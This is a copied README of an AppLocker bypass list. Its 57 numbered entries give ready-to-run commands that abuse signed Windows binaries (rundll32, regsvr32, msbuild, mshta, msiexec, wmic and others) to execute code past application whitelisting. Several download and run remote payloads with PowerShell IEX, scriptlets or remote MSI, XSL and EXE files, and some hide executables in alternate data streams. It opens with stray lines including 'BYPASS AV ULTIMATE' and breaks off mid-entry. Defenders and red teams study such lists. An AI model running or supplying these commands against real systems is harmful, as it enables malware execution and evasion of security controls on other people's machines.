тут

тут

xxx

BYPASS AV ULTIMATE


https://github.com/api0cradle/UltimateAppLockerByPassList


Ultimate AppLocker ByPass List

The goal of this repository is to document the most common techniques to bypass AppLocker. This README file contains a complete list of all known bypasses. Since AppLocker can be configured in different ways it makes sense to have master list of bypasses. This README.MD will be the master and will be updated with known and possible AppLocker bypasses.

I have created a list of verified bypasses that works against the default rules created with AppLocker.

For details on how I verified and how to create the default rules you can check my blog:https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

VerifiedBypasses-DefaultRules.MD

Please contribute and do point out errors or resources I have forgotten.


1. Rundll32.exe

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"


rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");


rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}


rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")


rundll32 shell32.dll,Control_RunDLL payload.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.


2. Regsvr32.exe

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.


3. Msbuild.exe

msbuild.exe pshell.xml

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:


4. Regsvcs.exe

regsvcs.exe /U regsvcs.dll


regsvcs.exe regsvcs.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:


5. Regasm.exe

regasm.exe /U regsvcs.dll


regasm.exe regsvcs.dll

  • Requires admin: /U does not require admin
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:


6. Bginfo.exe

bginfo.exe bginfo.bgi /popup /nolicprompt

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: No

Notes: Will work if BGinfo.exe is located in a path that is trusted by the policy.


7. InstallUtil.exe

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:


8. MSDT.exe

Open .diagcab package

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


9. mshta.exe

mshta.exe evilfile.hta

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:


10. Execute .Bat

cmd.exe /k < script.txt

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes:


11. Execute .PS1

Get-Content script.txt | iex

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes:


12. Execute .VBS

cscript.exe //E:vbscript script.txt

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes:


13. PresentationHost.exe

Missing Example

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


14. dfsvc.exe

Missing Example

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


15. IEExec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


16. cdb.exe

cdb.exe -cf x64_calc.wds -o notepad.exe

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes:


17. dnx.exe

dnx.exe consoleapp

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes:


18. rcsi.exe

rcsi.exe bypass.csx

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes:


19. csi.exe

Missing example

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes:


20. CPL loading location manipulation

Control.exe

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


21. msxsl.exe

msxsl.exe customers.xml script.xsl

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes:


22. msiexec.exe

msiexec /quiet /i cmd.msi


msiexec /q /i http://192.168.100.3/tmp/cmd.png

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


23. cmstp.exe

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Can also execute scriptlets - https://twitter.com/NickTyrer/status/958450014111633408

https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80


24. xwizard.exe

xwizard.exe argument1 argument2

DLL loading in same folder xwizard.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


25. fsi.exe

fsi.exe c:\folder\d.fscript

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes:


26. odbcconf.exe

odbcconf -f file.rsp

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


27. te.exe

te.exe bypass.wsc

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes: Can be used if the Test Authoring and Execution Framework is installed and is in a path that is whitelisted. Default location is: C:\program files (x86)\Windows Kits\10\testing\Runtimes\TAEF


28. Placing files in writeable paths under c:\windows

The following folders are by default writable and executable by normal users

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys


C:\Windows\System32\spool\drivers\color


C:\Windows\Tasks


C:\windows\tracing

  • Requires admin: No
  • Windows binary: N/A
  • Bypasses AppLocker Default rules: ?

Notes: This list is based on Windows 10 1709. Run accesschk to verify on other Windows versions


29. Atbroker.exe

ATBroker.exe /start malware

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


30. WMIC.exe

wmic process call create calc


wmic process get brief /format:"https://www.example.com/file.xsl


wmic os get /format:"MYXSLFILE.xsl"


wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


31. MavInject32.exe

MavInject32.exe <PID> /INJECTRUNNING <PATH DLL>

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


32. Pubprn.vbs

pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c662171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


33. slmgr.vbs

slmgr.vbs

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Requires registry keys for com object.


34. winrm.vbs

winrm quickconfig

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Requires registry keys for com object.


35. forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


36. SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


37. InfDefaultInstall.exe

InfDefaultInstall.exe shady.inf

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Only works on Windows 7? Windows 10 requires admin or digital signature


38. Winword.exe

winword.exe /l dllfile.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: No commonly made DLL example file


39. Runscripthelper.exe

runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


40. Tracker.exe

Tracker.exe /d .\calc.dll /c C:\Windows\write.exe

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes: Part of Visual studio. Requires TrackerUI.dll present in 1028 subfolder.


41. .WSF files

script.wsf

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes: .WSF files are supposed to not be blocked by AppLocker

  • Links:


42. PowerShell version 2

Powershell -version 2

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Bypasses Constrained language mode

  • Links:


43. CL_Invocation.ps1

. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1


SyncInvoke <executable> [args]

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes, as long as PowerShell version 2 is present

Notes: Requires PowerShell version 2


44. Incorrect permissions on files in folders

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"


wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:


45. Control.exe -Loading DLL/CPL binary from Alternate data stream

type notepad_reflective_x64.dll > c:\windows\tasks\zzz:notepad_reflective_x64.dll

control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Requires write access to a place that is allowed by AppLocker


46. Advpack.dll - LaunchINFSection

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:


47. Advpack.dll - RegisterOCX

rundll32.exe advpack.dll,RegisterOCX calc.exe

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:


48. zipfldr.dll - RouteTheCall

rundll32.exe zipfldr.dll,RouteTheCall calc.exe

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:


49. url.dll - OpenURL

rundll32.exe url.dll,OpenURL "C:\test\calc.hta"

rundll32.exe url.dll,OpenURL "C:\test\calc.url"

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


50. url.dll - FileProtocolHandler

rundll32.exe url.dll, FileProtocolHandler calc.exe

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


51. ieframe.dll - OpenURL

rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


52. shdocvw.dll - OpenURL

rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


53. ieadvpack.dll - LaunchINFSection

rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:


54. ie4unit.exe

ie4unit.exe -BaseSettings

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes: Requires to copy out ie4unit.exe and ieuinit.inf to a user controlled folder. Also need to add SCT in the MSIE4RegisterOCX.Windows7 section


55. Visual Studio Tools for Office - .VSTO files

evilfile.vsto

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: You need to build a solution using Visual Studio Tools for Office. User needs to confirm installation after executing.


56. Manage-bde.wsf

cscript c:\windows\system32\manage-bde.wsf

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Need to adjust comspec variable using: set comspec=c:\windows\system32\calc.exe


57. msdeploy.exe

msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\bypass.exe & pause"

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes: Part of web deploy: